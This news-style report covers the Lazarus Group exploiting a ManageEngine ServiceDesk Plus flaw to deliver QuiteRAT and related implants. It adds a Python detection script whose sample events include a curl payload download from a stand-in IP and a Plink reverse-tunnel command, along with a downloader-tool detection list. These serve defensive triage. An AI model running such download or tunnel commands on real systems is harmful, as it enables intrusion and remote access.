The North Korea-linked threat actor known as Lazarus Group has recently been observed exploiting a critical security vulnerability in Zoho ManageEngine ServiceDesk Plus, a flaw that has since been patched. This exploitation is part of their strategy to distribute a remote access trojan (RAT) called QuiteRAT.
The targets of these attacks have included internet backbone infrastructure and healthcare entities across Europe and the United States, according to a two-part report published by a cybersecurity company.
What is particularly noteworthy is that the Lazarus Group has persistently employed the same tactics and techniques over the years, despite these methods being well-documented and widely known within the cybersecurity community. This level of consistency highlights the group’s confidence in their operational approach.
The malware QuiteRAT is positioned as a successor to MagicRAT, which itself follows in the footsteps of TigerRAT. Additionally, during investigations into the adversary’s attack infrastructure reuse, a new threat named CollectionRAT was uncovered.
While QuiteRAT shares many capabilities with MagicRAT, it stands out due to its considerably smaller file size. Both of these implants are constructed using the Qt framework and exhibit features like arbitrary command execution.
The decision to use the Qt framework seems strategic, as it introduces complexity into the malware’s code, making analysis more challenging for security researchers.
In early 2023, the Lazarus Group exploited CVE-2022-47966, merely five days after a proof-of-concept for the vulnerability was made available online. This exploit was used to directly deploy the QuiteRAT binary from a malicious URL.
The researchers have observed that QuiteRAT is a clear evolutionary step from MagicRAT. While MagicRAT is considerably larger, averaging around 18 MB, QuiteRAT is significantly smaller, at approximately 4 to 5 MB. Furthermore, QuiteRAT lacks a built-in persistence mechanism, requiring a command from the server to ensure its continued operation on a compromised host.
The Lazarus Group increasingly relies on open-source tools and frameworks, particularly in the initial access phase of their attacks, rather than exclusively in the post-compromise phase. The GoLang-based open-source DeimosC2 framework has been used to achieve persistent access, while CollectionRAT is mainly employed for metadata gathering, running arbitrary commands, managing files, and delivering additional payloads.
While the propagation method of CollectionRAT remains unclear, evidence suggests that a trojanized version of the PuTTY Link (Plink) utility is used to establish a remote tunnel to the system and serve the malware.
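As an added example, not code from the report or from the researchers, the following triage script runs over constructed process-creation events and flags the two patterns described above: a download tool launched beneath the ServiceDesk Plus process tree (as in the direct deployment of the RAT binary from a URL) and a command line carrying Plink's reverse-tunnel syntax. The ServiceDesk Plus install path, the event field names and the sample addresses are all assumptions made for the example.

```python
import re

# Constructed Sysmon-style process-creation events; none of these are real telemetry from the report.
SAMPLE_EVENTS = [
    {"parent": r"C:\ManageEngine\ServiceDesk\jre\bin\java.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -o C:\\Windows\\Temp\\svc.exe http://198.51.100.7/svc.exe"},
    {"parent": r"C:\ManageEngine\ServiceDesk\jre\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\ProgramData\updater.exe",
     "cmdline": "updater.exe -N -R 8443:127.0.0.1:3389 user@203.0.113.5 -pw pass"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\PuTTY\plink.exe",
     "cmdline": "plink.exe -ssh admin@10.0.0.5"},
]

# Assumed install path fragment for the ServiceDesk Plus Java process; adjust to the real deployment.
SERVICEDESK_PARENT = re.compile(r"manageengine\\servicedesk", re.I)
# Built-in tools commonly used to fetch a payload from a URL.
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe", "wget.exe"}
URL = re.compile(r"https?://", re.I)
# Plink's remote-forward option (-R listen_port:host:port); case-sensitive like the real flag.
PLINK_REVERSE = re.compile(r"(^|\s)-R\s+\d+:")


def triage(events):
    """Return (rule, command line) pairs for events matching either pattern."""
    hits = []
    for ev in events:
        image_name = ev["image"].rsplit("\\", 1)[-1].lower()
        # Rule 1: the web application's process tree should not be fetching executables from the internet.
        if (SERVICEDESK_PARENT.search(ev["parent"])
                and image_name in DOWNLOADERS
                and URL.search(ev["cmdline"])):
            hits.append(("servicedesk_child_download", ev["cmdline"]))
        # Rule 2: a trojanized Plink may be renamed, so match the argument shape, not the file name.
        if PLINK_REVERSE.search(ev["cmdline"]):
            hits.append(("plink_reverse_tunnel_syntax", ev["cmdline"]))
    return hits


if __name__ == "__main__":
    for rule, cmdline in triage(SAMPLE_EVENTS):
        print(f"{rule}: {cmdline}")
```

Rule 2 will also fire on legitimate administrative reverse tunnels, so it is a lead for review rather than a verdict on its own.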
Previously, Lazarus Group relied on custom-built implants like MagicRAT, VSingle, Dtrack, and YamaBot to establish initial access to compromised systems. These implants would then deploy various open-source or dual-use tools to execute malicious activities within the compromised network.
The discovery of CollectionRAT indicates that the Lazarus Group is continually adapting its tactics and expanding its toolkit. This includes weaponizing newly disclosed vulnerabilities in software to achieve their objectives more effectively.